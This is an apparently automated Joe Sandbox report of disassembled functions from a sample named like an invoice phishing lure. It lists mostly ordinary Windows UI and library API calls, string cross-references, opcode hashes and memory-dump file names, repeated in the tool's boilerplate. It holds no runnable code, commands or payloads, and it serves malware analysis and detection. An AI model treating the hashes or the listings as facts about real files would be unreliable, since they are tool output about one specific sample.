Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3Rect$DrawFillFocusH_prolog3_Inflate_strlen
String ID: ...
API String ID: 1257946628-440645147
Opcode ID: b7cf31f1bd71e7574a690a5f4807897a4500172a17692a8cf3f9483fefd1724f
Instruction ID: 51ecbdd18e68e6bfb4f2b25478c3e5bbbf615c95b736912faba9d9f3b31eab4d
Opcode Fuzzy Hash: b7cf31f1bd71e7574a690a5f4807897a4500172a17692a8cf3f9483fefd1724f
Instruction Fuzzy Hash: 2941293190061DDFCF15EF64CC46AD9B7B5FF09310F0441D9AA09AB2A1DB71AA95CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C006BB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C006C2
SysStringLen.OLEAUT32(?), ref: 00C00701
SysStringLen.OLEAUT32(?), ref: 00C00723
SysFreeString.OLEAUT32(?), ref: 00C007AA

Strings

@, xrefs: 00C00748

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: String$FreeH_prolog3
String ID: @
API String ID: 315669285-2766056989
Opcode ID: 921d9390429e925cc23b362c08703e0beceab9d2f122899c8582965b8225f887
Instruction ID: df196f668c8f716854b556b466a2b0c0d70dc25b0b76c505be58bd6f1524edf2
Opcode Fuzzy Hash: 921d9390429e925cc23b362c08703e0beceab9d2f122899c8582965b8225f887
Instruction Fuzzy Hash: 18316F7190024AEFDF05DFE8CD85AEFBBB9EF08314F104129F925A6291DA349A51CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF8EE5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF8EEC
GetCursorPos.USER32(?,00000010), ref: 00BF8F26
ScreenToClient.USER32 ref: 00BF8F33

Part of subcall function 00BF534B: PtInRect.USER32(?,?,?), ref: 00BF5373
Part of subcall function 00BF534B: GetClientRect.USER32 ref: 00BF5395
Part of subcall function 00BF534B: PtInRect.USER32(?,?,?), ref: 00BF53BF

SendMessageA.USER32(?,00000030,00000000,00000000), ref: 00BF900A

Strings

8, xrefs: 00BF8F8B, 00BF8FC0, 00BF8FE3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Client$CursorH_prolog3MessageScreenSend
String ID: 8
API String ID: 3885313687-3897458245
Opcode ID: 415c877eb5cf3be715050627a13f9b485609f489470180ae740ec0729644f344
Instruction ID: 89ed8af2a01f101f001b7f037151ee8c4354ec805bc50d2b432a163ea63a2ed2
Opcode Fuzzy Hash: 415c877eb5cf3be715050627a13f9b485609f489470180ae740ec0729644f344
Instruction Fuzzy Hash: 18313930A0060ADFDF18DF64C898BBEB7E9FB44314F0445A9A615AB2A1DF74AD49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2546, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BE25B6
GetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BE25C1
LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BE25D2
GetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00BE25DF

Strings

@Mxt, xrefs: 00BE25C1, 00BE25DF

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID: @Mxt
API String ID: 1172841412-1922883433
Opcode ID: f33c57a83c82db54092b8efc31a834c8bf842eed19562b1eb7605078c84f230e
Instruction ID: 6510fd4e019ce58b8a30d6cc5c1bc4487f7c15050bcb699e2ad0c01d26b4dc63
Opcode Fuzzy Hash: f33c57a83c82db54092b8efc31a834c8bf842eed19562b1eb7605078c84f230e
Instruction Fuzzy Hash: 06114F25E10389EB8F04AFF6CD558AEF3FDAF94300B04449AA902E7351EB34DA058765

Uniqueness

Uniqueness Score: -1.00%

Function 00BAC7BC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

Edit, xrefs: 00BAC813

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 4362adda46b147f08c28957c27b0d3670f96bf76fd89c4a46f0b127665394ec3
Instruction ID: 60407fb1e694ffb8076e8131b97b0f756b69c5c17ac8a4cb165dbe37853cf802
Opcode Fuzzy Hash: 4362adda46b147f08c28957c27b0d3670f96bf76fd89c4a46f0b127665394ec3
Instruction Fuzzy Hash: 3211C230348205EBEF201B258C49FB63BE8FB86740F1444BDE542E25A2EBA4DC04DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BF4DFF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF4E06

Part of subcall function 00BB274F: __EH_prolog3.LIBCMT ref: 00BB2756
Part of subcall function 00BB274F: GetWindowDC.USER32(00000000,00000004,00C01693,00000000), ref: 00BB2782

GetDeviceCaps.GDI32(?,0000005A), ref: 00BF4E41
MulDiv.KERNEL32(00000048,?,00000000), ref: 00BF4E60
_strlen.LIBCMT ref: 00BF4E7F

Strings

%Ts(%i), xrefs: 00BF4E68

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$CapsDeviceWindow_strlen
String ID: %Ts(%i)
API String ID: 1979030421-2215203555
Opcode ID: dbc381c76ef8890eeab1c94ea9269810dba56b27e4d117b52caa7512ea16228d
Instruction ID: bb5c89dedefbeb7e03190b9fc01534fcc2f0fae0400a080e7cc2e7ac5b29ff12
Opcode Fuzzy Hash: dbc381c76ef8890eeab1c94ea9269810dba56b27e4d117b52caa7512ea16228d
Instruction Fuzzy Hash: B0113070A00119AFDF14AF54CD81AFE7BA4FF08350F044168B909A7292CB705E448AB5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9043, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BB904A
GetModuleHandleW.KERNEL32(user32.dll), ref: 00BB9093
GetProcAddress.KERNEL32(00000000,GetGestureConfig), ref: 00BB90A3

Part of subcall function 00BBBDEC: GetModuleHandleW.KERNEL32(user32.dll,?,?,?,?,?,00BB9075,?), ref: 00BBBE06
Part of subcall function 00BBBDEC: GetProcAddress.KERNEL32(00000000,SetGestureConfig), ref: 00BBBE16

Strings

user32.dll, xrefs: 00BB9085
GetGestureConfig, xrefs: 00BB909D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressHandleModuleProc$H_prolog3
String ID: GetGestureConfig$user32.dll
API String ID: 1623054726-2894121015
Opcode ID: 53156c0f5892d66b0632c62cd205c1eba60c3de86c89bcde7c2fab35bdb5f1f2
Instruction ID: 2c95ae87527a81e089c1f0aa8bdd456e9ea6385b97d03d754fc4355f9bdeb18a
Opcode Fuzzy Hash: 53156c0f5892d66b0632c62cd205c1eba60c3de86c89bcde7c2fab35bdb5f1f2
Instruction Fuzzy Hash: 2601A931A00305DFDB10ABB4CC49FAEBBF8AB58711F044669B652E32D1DBF49940CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00BC67DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetAtomNameA.KERNEL32(?,?,00000100), ref: 00BC6800
GetLastError.KERNEL32 ref: 00BC680A
GlobalGetAtomNameA.KERNEL32 ref: 00BC6827
GetLastError.KERNEL32 ref: 00BC6831

Strings

@Mxt, xrefs: 00BC680A, 00BC6831

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AtomErrorLastName$Global
String ID: @Mxt
API String ID: 815022922-1922883433
Opcode ID: cde394518db3596b036b8967bf5ab0e2a39a300599a2c37b72d79e6ee600cfe7
Instruction ID: 44a164cbef3270ce8b9f3d33e498793eb054f5be1ba2f3589e779963efe6c335
Opcode Fuzzy Hash: cde394518db3596b036b8967bf5ab0e2a39a300599a2c37b72d79e6ee600cfe7
Instruction Fuzzy Hash: 8C018C70600108EFCB209F25EC99EFEBBF9FF01705B5005AAE806D3120E730DD458AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0CBA, Relevance: 7.8, APIs: 5, Instructions: 295COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BD0CC1
_strlen.LIBCMT ref: 00BD0DA7
_strlen.LIBCMT ref: 00BD0E9C
__EH_prolog3.LIBCMT ref: 00BD0F2E
_strlen.LIBCMT ref: 00BD1030

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$H_prolog3
String ID:
API String ID: 2883720156-0
Opcode ID: ae6308b9a99729169432a217884adf1ffe608380bcedc21cae9933f5b3d980ce
Instruction ID: 87290338458ea6a146db4f3f3e04fb78c7b590d52d8e44fda170de27e5b400d9
Opcode Fuzzy Hash: ae6308b9a99729169432a217884adf1ffe608380bcedc21cae9933f5b3d980ce
Instruction Fuzzy Hash: 47B1813190020ADFDF04EB64C995BFEBBB5EF55310F044499E916A7392EF74AA04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6A40, Relevance: 7.7, APIs: 5, Instructions: 234COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00BC6A47
_strlen.LIBCMT ref: 00BC6A72
VariantClear.OLEAUT32(?), ref: 00BC6C45

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClearH_prolog3_catch_Variant_strlen
String ID:
API String ID: 1755785604-0
Opcode ID: 349cf73682b6cf646c39047050e3e99ab6ad6b0fc2d60e504c846e00fd2a7d3d
Instruction ID: 65056008a2a5c6e790b31754267ccef26d29f5ff60aa7fd4672f9643730ef72e
Opcode Fuzzy Hash: 349cf73682b6cf646c39047050e3e99ab6ad6b0fc2d60e504c846e00fd2a7d3d
Instruction Fuzzy Hash: CF917671D04219EBCF04DFA8D885EEEBBB1EF09310F1881A9F856B7261DB359951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BE0904, Relevance: 7.7, APIs: 5, Instructions: 178windowmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE090B
GlobalAlloc.KERNEL32(00000040,0000000C), ref: 00BE0999
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00BE09DE
SendMessageA.USER32(?,00001007,00000000,0000000F), ref: 00BE0A6C
SendMessageA.USER32(?,00001200,00000000,00000000), ref: 00BE0A86

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$AllocGlobalH_prolog3
String ID:
API String ID: 3246992648-0
Opcode ID: cda4bc87015d2aa45b729ec6992c544fc43ee02673e19716c12f13408caefef5
Instruction ID: 3281cc160e45a6f291d4c8c1a172a3374fb94ec693ecf7d6d30a7c7c0bad0084
Opcode Fuzzy Hash: cda4bc87015d2aa45b729ec6992c544fc43ee02673e19716c12f13408caefef5
Instruction Fuzzy Hash: AD611675E00219DFDF14DFA5CC95AAEBBB9FF48710F004169E915AB290DB70A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C4238A, Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00C423B9

Part of subcall function 00BB39EE: ClientToScreen.USER32(?,?), ref: 00BB39FD
Part of subcall function 00BB39EE: ClientToScreen.USER32(?,?), ref: 00BB3A0A

PtInRect.USER32(?,00000000,?), ref: 00C423D3
PtInRect.USER32(?,?,?), ref: 00C4244C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: f16a3ad2f8f3e17ca38b0d41e199639bf1d48791030efdd5b156b7816ab290d4
Instruction ID: 9608af08d441b0fc9f2aa4fdd3960bb1899e5fd51f42386f2f73e847fb5db2ed
Opcode Fuzzy Hash: f16a3ad2f8f3e17ca38b0d41e199639bf1d48791030efdd5b156b7816ab290d4
Instruction Fuzzy Hash: 6F412771A0020AEFCF10CFA8D9869EEBBF5FF08300F504469F956EB255D635AA449B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F0E2, Relevance: 7.6, APIs: 5, Instructions: 116windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32(?,00000105,?,?,?,00C2B05D), ref: 00C1F12C
GetParent.USER32(00000000), ref: 00C1F147
GetParent.USER32(?), ref: 00C1F175
UpdateWindow.USER32(00000000), ref: 00C1F209
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00C1F246

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Parent$FocusMessageSendUpdateWindow
String ID:
API String ID: 2438739141-0
Opcode ID: 21f830fcf733d256cf408706d7786826a03b7c5c58e4eaa63252b117813ba77c
Instruction ID: 8bb6e9bbbd41633dcd288f23019a4bff003291314bbb5dc7d5da28c0eb867065
Opcode Fuzzy Hash: 21f830fcf733d256cf408706d7786826a03b7c5c58e4eaa63252b117813ba77c
Instruction Fuzzy Hash: 4341A275600711EFCF15AF758C44AAD3BA5AB46720F14037DE822DB3A5CF7499429B90

Uniqueness

Uniqueness Score: -1.00%

Function 00BE461B, Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE4622
CoTaskMemFree.OLE32(?), ref: 00BE46D4

Part of subcall function 00BA46EC: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BA46FD

WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 00BE46BA
GetParent.USER32(?), ref: 00BE46F2
SendMessageA.USER32(?,00000466,00000104,00000000), ref: 00BE4717

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ByteCharMultiWide$FreeH_prolog3MessageParentSendTask
String ID:
API String ID: 2142908925-0
Opcode ID: 201870ea9b730e54fc081979246cd377a8b94bf6994de6b5b72c577377c80db6
Instruction ID: bc7d09907d81cb5eb9ef49f7a1c05bb0d3bca5da967e7fb41d28d181eb207414
Opcode Fuzzy Hash: 201870ea9b730e54fc081979246cd377a8b94bf6994de6b5b72c577377c80db6
Instruction Fuzzy Hash: 17316CB1B00216EFDB04AFA5CC8597F7BE9EF49310B1402A9B916E7391DB70AC018B65

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC2BB, Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BBC2C5
GetTopWindow.USER32(?), ref: 00BBC2F2
GetDlgCtrlID.USER32(00000000), ref: 00BBC304
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00BBC35F
GetWindow.USER32(00000000,00000002), ref: 00BBC3A1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: 9b569600509e53572e534444eacabc638e2506844c6109973d29d4b21bf2418e
Instruction ID: d5e26ff1d062963c3a9a5998ca6bb9ea8078e57ae129fcdcb464c3771ff6674b
Opcode Fuzzy Hash: 9b569600509e53572e534444eacabc638e2506844c6109973d29d4b21bf2418e
Instruction Fuzzy Hash: 05218B71800218ABDB25EF60CD45EFEBBF9EF95300F004199F815E2252EBB08E04DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6FE3, Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE6FEA
SetMenu.USER32(?,?), ref: 00BE7063
GetMenuBarInfo.USER32(?,000000FD,?,?), ref: 00BE7078
SetMenu.USER32(?,00000000), ref: 00BE7085

Part of subcall function 00BE632D: __EH_prolog3.LIBCMT ref: 00BE6334
Part of subcall function 00BE632D: SetRectEmpty.USER32 ref: 00BE63D6

GetMenuBarInfo.USER32(?,?,?,?), ref: 00BE70B4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Menu$H_prolog3Info$EmptyRect
String ID:
API String ID: 2644988735-0
Opcode ID: 80dde5da11803e27de6704904ba6c3b05806f154c6cba0ca2b46dc08d5b4a79e
Instruction ID: 277335f6450c180e218e7aaf8527e1893a9e903558ec2b5a21562d9db8aaa3f2
Opcode Fuzzy Hash: 80dde5da11803e27de6704904ba6c3b05806f154c6cba0ca2b46dc08d5b4a79e
Instruction Fuzzy Hash: 1A21B071704206EBCF199F64CC49AAD3BA6FF08310F204269F915D72A2EF718810DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00BEEFC2, Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32(00000000,?), ref: 00BEF003
GetObjectA.GDI32(?,00000018,?), ref: 00BEF012
DeleteObject.GDI32(?), ref: 00BEF02D
DeleteObject.GDI32(00000000), ref: 00BEF036
DestroyIcon.USER32(00000000), ref: 00BEF09E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
